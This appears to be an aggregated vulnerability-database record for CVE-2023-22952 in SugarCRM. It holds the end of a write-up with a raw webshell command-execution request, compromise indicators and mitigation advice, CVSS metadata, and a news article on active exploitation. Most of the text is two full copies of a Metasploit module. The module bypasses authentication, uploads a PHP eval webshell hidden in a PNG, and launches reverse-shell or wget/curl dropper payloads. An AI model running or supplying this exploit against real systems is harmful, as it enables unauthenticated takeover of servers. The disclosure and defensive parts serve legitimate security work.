Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n <html lang='en_us'>\n <head>\n ---- A LOT of HTML CRAP ----\n <div id=\"main\">\n <div id=\"content\">\n <table style=\"width:100%\" id=\"contentTable\"><tr><td>\n [\"cache\\/images\\/yohoo.phar\"]\n \n\n**Command execution of `ls -l`**\n \n \n POST /cache/images/yohoo.phar?0=passthru HTTP/1.1\n Host:TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=06457e85-5a6c-4428-880a-8e5134137650\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 10\n Connection: close\n \n 1=bHMgLWwK\n \n\nRemote command execution response\n \n \n HTTP/1.1 200 OK\n Date: Mon, 16 Jan 2023 16:23:10 GMT\n Server: Apache/2.4.10 (Debian)\n Vary: Accept-Encoding\n Content-Length: 1209\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n PNG\n \n --Garbled binary text--total 76\n -rw-r--r-- 1 www-data www-data 207 Jan 16 14:38 yohoo.phar\n --Garbled binary text--\n \n\nYou can of course vary the 0 parameter with other PHP shell command functions such as `exec`, `shell_exec` or `system`.\n\n## Evidence of compromise\n\nWhen you want to check if your system is compromised, please look for unexpected files in the `/cache/images/` directory. The published [exploit](<https://packetstormsecurity.com/files/170346/SugarCRM-Shell-Upload.html>) had a filename `sweet.phar` that was not cleaned. However, attackers have changed these filenames such as `imagefile.phar`, `meow.phar`, `rvsm.phar`, `aws.phar`, and are using files with other extensions. \nAlso be conscious of the fact that the files might have been cleaned up by the attacker to cover their tracks.\n\nOther evidence might be failed execution request for files under the `/cache/images/` directory with the extension `php`, `phar`, `phtml`, `php7`, or any other executable extension **NOT** allowed by your web server configuration. 
The response codes can be found in your web server logs, such as `404` \u2013 the file was not found, or `403` \u2013 access was denied by the web server.\n\n## Mitigation\n\nPatch your system following the vendor guidance in [January 5, 2023: Security vulnerability update and FAQ](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>); this is the only measure that removes both the authentication bypass and the missing upload validation. Note that the NVD CVSS 3.1 vector for this CVE (`PR:L`, score 8.8) assumes low-privileged access, whereas the authentication bypass described above allows unauthenticated exploitation, so prioritise patching accordingly. As defence in depth, additionally prevent PHP parsing/execution in the `/cache/images/` directory, for example with an `.htaccess` file (Apache only, and only honoured where `AllowOverride` permits it) or the equivalent directive in your web server configuration, and/or tighten the security settings in the `php.ini` file. These web-server measures only stop the uploaded file from being executed; the unauthenticated upload itself remains possible until the patch is applied. General hardening guidance for PHP upload directories is widely available. \nAnother less obvious security measure to consider is enabling `SAML` authentication, which mitigates the authentication bypass issue and hence protects you against unauthenticated malicious file uploads (it does not address the upload validation flaw for authenticated users).\n\nI have created a `Metasploit` module to test this vulnerability. A local version of this module can be found in the **References** section. 
\n[Submission](<https://github.com/rapid7/metasploit-framework/pull/17507>) to the Metasploit mainline is complete and the module is in production.\n\n## References\n\n[Full Disclosure](<https://seclists.org/fulldisclosure/2022/Dec/31>) \n[Public Exploit \u2013 Packetstorm](<https://packetstormsecurity.com/files/170346/SugarCRM-Shell-Upload.html>) \n[Security Advisory \u2013 sugarcrm-sa-2023-001](<https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/>) \n[January 5, 2023: Security vulnerability update and FAQ](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>) \n[Encoding web shells in PNG IDAT chunks](<https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/>) \n[Persistent PHP payloads in PNGs](<https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html>) \n[Metasploit Development h00die-gr3y](<https://github.com/h00die-gr3y/Metasploit/blob/main/README.md>)\n\n### Credits\n\nCredit goes to `sw33t.0day`, who discovered this vulnerability.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-11T00:00:00", "type": "attackerkb", "title": "CVE-2023-22952", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-01-11T00:00:00", "id": "AKB:3236E8D5-3A5F-4A70-9701-F945AE2F7B4C", "href": "https://attackerkb.com/topics/E486ui94II/cve-2023-22952", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-15T13:46:36", "description": "In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-11T09:15:00", "type": "prion", "title": "CVE-2023-22952", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-03-10T17:15:00", "id": "PRION:CVE-2023-22952", "href": "https://kb.prio-n.com/vulnerability/CVE-2023-22952", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-07-24T00:49:14", 
"description": "This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-10T00:00:00", "type": "zdt", "title": "SugarCRM 12.x Remote Code Execution / Shell Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-03-10T00:00:00", "id": "1337DAY-ID-38255", "href": "https://0day.today/exploit/description/38255", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'securerandom'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::PhpPayloadPng\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SugarCRM 
unauthenticated Remote Code Execution (RCE)',\n 'Description' => %q{\n This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,\n Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and\n Serve versions prior to 12.0.2.\n\n The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with\n embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint\n /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration,\n the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and\n gaining access to the system.\n\n This vulnerability does not require authentication because there is a missing authentication check in the\n loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get\n destroyed and hence the attacker can continue to send valid requests to the application.\n\n Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain\n access to the underlying operating system as the user that the web services are running as (typically www-data).\n },\n 'Author' => [\n 'Sw33t.0day', # discovery\n 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2023-22952' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ],\n [ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ],\n [ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ],\n [ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ],\n [ 'PACKETSTORM', '170346' ]\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => [ 'unix', 'linux', 'php' ],\n 'Privileged' => false,\n 'Arch' => [ ARCH_CMD, ARCH_PHP, 
ARCH_X64, ARCH_X86 ],\n 'Targets' => [\n [\n 'PHP',\n {\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X64, ARCH_X86 ],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2022-12-28',\n 'DefaultOptions' => {\n 'SSL' => false,\n 'RPORT' => 80\n },\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'SugarCRM base url', '/' ]),\n OptString.new('WEBSHELL', [\n false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. 
Webshell name will be randomly generated if left unset.', ''\n ]),\n OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])\n ]\n )\n end\n\n def authenticate\n # generate PHP session-id\n @phpsessid = \"PHPSESSID=#{SecureRandom.uuid}\"\n\n # randomize user and password to obfuscate and make finger printing difficult.\n user_name = Rex::Text.rand_name\n user_password = Rex::Text.rand_text_alphanumeric(8..16)\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'user_name' => user_name.to_s,\n 'user_password' => user_password.to_s\n }\n })\n if res && res.code == 500 && !res.body.blank?\n return true\n else\n return false\n end\n end\n\n def upload_webshell\n # randomize file name and extension if option WEBSHELL is not set\n file_ext = ['phar', 'phtml']\n if datastore['WEBSHELL'].blank?\n @webshell_name = \"#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}\"\n else\n @webshell_name = datastore['WEBSHELL'].to_s\n end\n\n # select webshell depending on the target setting (PHP or others).\n @post_param = Rex::Text.rand_text_alphanumeric(1..8)\n @get_param = Rex::Text.rand_text_alphanumeric(1..8)\n\n if target['Type'] == :php\n payload = \"<?php @eval(base64_decode($_POST[\\'#{@post_param}\\']));?>\"\n else\n payload = \"<?=$_GET[\\'#{@get_param}\\'](base64_decode($_POST[\\'#{@post_param}\\']));?>\"\n end\n\n # inject PHP payload into the PLTE chunk of the PNG image\n png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')\n if png_webshell.nil?\n return false\n end\n\n # construct multipart form data\n form_data = Rex::MIME::Message.new\n form_data.add_part('AttachFiles', nil, nil, 'form-data; name=\"action\"')\n 
form_data.add_part('EmailTemplates', nil, nil, 'form-data; name=\"module\"')\n form_data.add_part(png_webshell.to_s, 'image/png', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{@webshell_name}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\",\n 'data' => form_data.to_s\n })\n if res && res.code == 200 && !res.body.blank?\n # parse HTML to find the webshell name embedded in a table that indicates a successful upload\n html = res.get_html_document\n if html.at(\"td[contains(\\\"#{@webshell_name}\\\")]\")\n return true\n else\n return false\n end\n else\n return false\n end\n end\n\n def execute_php(cmd, _opts = {})\n payload = Base64.strict_encode64(cmd)\n return send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => {\n @post_param => payload\n }\n })\n end\n\n def execute_command(cmd, _opts = {})\n payload = Base64.strict_encode64(cmd)\n php_cmd_function = datastore['COMMAND']\n return send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_get' => {\n @get_param => php_cmd_function\n },\n 'vars_post' => {\n @post_param => payload\n }\n })\n end\n\n def exploit\n fail_with(Failure::NoAccess, 'Authentication bypass failed.') unless authenticate\n fail_with(Failure::NotVulnerable, \"Webshell #{@webshell_name} upload failed, the system is likely patched.\") unless upload_webshell\n register_file_for_cleanup(@webshell_name.to_s)\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :php\n execute_php(payload.encoded)\n 
when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(linemax: 65536)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/38255", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-07-24T03:07:52", "description": "This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration, the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and gaining access to the system. This vulnerability does not require authentication because there is a missing authentication check in the loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get destroyed and hence the attacker can continue to send valid requests to the application. 
Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain access to the underlying operating system as the user that the web services are running as (typically www-data).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-09T15:28:03", "type": "metasploit", "title": "SugarCRM unauthenticated Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-03-09T15:28:46", "id": "MSF:EXPLOIT-MULTI-HTTP-SUGARCRM_WEBSHELL_CVE_2023_22952-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/sugarcrm_webshell_cve_2023_22952/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'securerandom'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::PhpPayloadPng\n\n def initialize(info = {})\n super(\n update_info(\n 
info,\n 'Name' => 'SugarCRM unauthenticated Remote Code Execution (RCE)',\n 'Description' => %q{\n This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,\n Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and\n Serve versions prior to 12.0.2.\n\n The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with\n embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint\n /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration,\n the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and\n gaining access to the system.\n\n This vulnerability does not require authentication because there is a missing authentication check in the\n loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get\n destroyed and hence the attacker can continue to send valid requests to the application.\n\n Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain\n access to the underlying operating system as the user that the web services are running as (typically www-data).\n },\n 'Author' => [\n 'Sw33t.0day', # discovery\n 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2023-22952' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ],\n [ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ],\n [ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ],\n [ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ],\n [ 'PACKETSTORM', '170346' ]\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => [ 'unix', 'linux', 'php' ],\n 'Privileged' => false,\n 'Arch' => 
[ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],\n 'Targets' => [\n [\n 'PHP',\n {\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X64, ARCH_X86 ],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2022-12-28',\n 'DefaultOptions' => {\n 'SSL' => false,\n 'RPORT' => 80\n },\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'SugarCRM base url', '/' ]),\n OptString.new('WEBSHELL', [\n false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. 
Webshell name will be randomly generated if left unset.', ''\n ]),\n OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])\n ]\n )\n end\n\n def authenticate\n # generate PHP session-id\n @phpsessid = \"PHPSESSID=#{SecureRandom.uuid}\"\n\n # randomize user and password to obfuscate and make finger printing difficult.\n user_name = Rex::Text.rand_name\n user_password = Rex::Text.rand_text_alphanumeric(8..16)\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'user_name' => user_name.to_s,\n 'user_password' => user_password.to_s\n }\n })\n if res && res.code == 500 && !res.body.blank?\n return true\n else\n return false\n end\n end\n\n def upload_webshell\n # randomize file name and extension if option WEBSHELL is not set\n file_ext = ['phar', 'phtml']\n if datastore['WEBSHELL'].blank?\n @webshell_name = \"#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}\"\n else\n @webshell_name = datastore['WEBSHELL'].to_s\n end\n\n # select webshell depending on the target setting (PHP or others).\n @post_param = Rex::Text.rand_text_alphanumeric(1..8)\n @get_param = Rex::Text.rand_text_alphanumeric(1..8)\n\n if target['Type'] == :php\n payload = \"<?php @eval(base64_decode($_POST[\\'#{@post_param}\\']));?>\"\n else\n payload = \"<?=$_GET[\\'#{@get_param}\\'](base64_decode($_POST[\\'#{@post_param}\\']));?>\"\n end\n\n # inject PHP payload into the PLTE chunk of the PNG image\n png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')\n if png_webshell.nil?\n return false\n end\n\n # construct multipart form data\n form_data = Rex::MIME::Message.new\n form_data.add_part('AttachFiles', nil, nil, 'form-data; name=\"action\"')\n 
form_data.add_part('EmailTemplates', nil, nil, 'form-data; name=\"module\"')\n form_data.add_part(png_webshell.to_s, 'image/png', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{@webshell_name}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\",\n 'data' => form_data.to_s\n })\n if res && res.code == 200 && !res.body.blank?\n # parse HTML to find the webshell name embedded in a table that indicates a successful upload\n html = res.get_html_document\n if html.at(\"td[contains(\\\"#{@webshell_name}\\\")]\")\n return true\n else\n return false\n end\n else\n return false\n end\n end\n\n def execute_php(cmd, _opts = {})\n payload = Base64.strict_encode64(cmd)\n return send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => {\n @post_param => payload\n }\n })\n end\n\n def execute_command(cmd, _opts = {})\n payload = Base64.strict_encode64(cmd)\n php_cmd_function = datastore['COMMAND']\n return send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_get' => {\n @get_param => php_cmd_function\n },\n 'vars_post' => {\n @post_param => payload\n }\n })\n end\n\n def exploit\n fail_with(Failure::NoAccess, 'Authentication bypass failed.') unless authenticate\n fail_with(Failure::NotVulnerable, \"Webshell #{@webshell_name} upload failed, the system is likely patched.\") unless upload_webshell\n register_file_for_cleanup(@webshell_name.to_s)\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :php\n execute_php(payload.encoded)\n 
when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(linemax: 65536)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2023-01-14T08:11:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjkB5AmEbwM4iIOKiuxSqAuEFCB26nFZNhi3MlX28DbJMTiPHEhK8w_VHD4m0ZctINGUVCe3SgBLZX2hWEak6TENZ3_nCdQx7WMGMqjrjXCjdVS8zWcx9md3i_ZI457Tk6-gGIIvBY--Nz2MXISSH9dmYkwmv-vQmHhCoLvkGYsY6kdCdEEoiI6qHke/s728-rj-e365/catci.png>)\n\nA majority of internet-exposed Cacti servers have not been patched against a recently patched critical security vulnerability that has come under active exploitation in the wild.\n\nThat's according to attack surface management platform Censys, which [found](<https://censys.io/cve-2022-46169-cacti/>) only 26 out of a total of 6,427 servers to be running a [patched version](<https://github.com/Cacti/cacti/releases/tag/release%2F1.2.23>) of Cacti (1.2.23 and 1.3.0).\n\nThe [issue](<https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf>) in question relates to [CVE-2022-46169](<https://nvd.nist.gov/vuln/detail/CVE-2022-46169>) (CVSS score: 9.8), a combination of authentication bypass and command injection that enables an unauthenticated user to execute arbitrary code on an affected version of the open-source, web-based monitoring solution.\n\nDetails about the flaw, which impacts versions 1.2.22 and below, were first revealed by SonarSource. 
The flaw was reported to the project maintainers on December 2, 2022.\n\n\"A hostname-based authorization check is not implemented safely for most installations of Cacti,\" SonarSource researcher Stefan Schiller [noted](<https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/>) earlier this month, adding \"unsanitized user input is propagated to a string used to execute an external command.\"\n\nThe public disclosure of the vulnerability has also led to \"exploitation attempts,\" with the [Shadowserver Foundation](<https://twitter.com/Shadowserver/status/1611700723556786176>) and [GreyNoise](<https://viz.greynoise.io/tag/cacti-remote-agent-php-unauthenticated-command-injection-attempt?days=30>) warning of malicious attacks originating from one IP address located in Ukraine so far.\n\nA majority of the unpatched versions (1,320) are located in Brazil, followed by Indonesia, the U.S., China, Bangladesh, Russia, Ukraine, the Philippines, Thailand, and the U.K.\n\n### SugarCRM Flaw Actively Exploited to Drop Web Shells\n\nThe development comes as SugarCRM [shipped fixes](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>) for a publicly disclosed vulnerability that has also been actively weaponized to drop a PHP-based web shell on 354 unique hosts, Censys [said](<https://censys.io/tracking-a-sugarcrm-zero-day/>) in an independent advisory.\n\nThe bug, tracked as [CVE-2023-22952](<https://nvd.nist.gov/vuln/detail/CVE-2023-22952>), concerns a case of missing input validation that could result in injection of arbitrary PHP code. It has been addressed in SugarCRM versions 11.0.5 and 12.0.2.\n\nIn the attacks detailed by Censys, the web shell is used as a conduit to execute additional commands on the infected machine with the same permissions as the user running the web service. A majority of the infections have been reported in the U.S., Germany, Australia, France, and the U.K. 
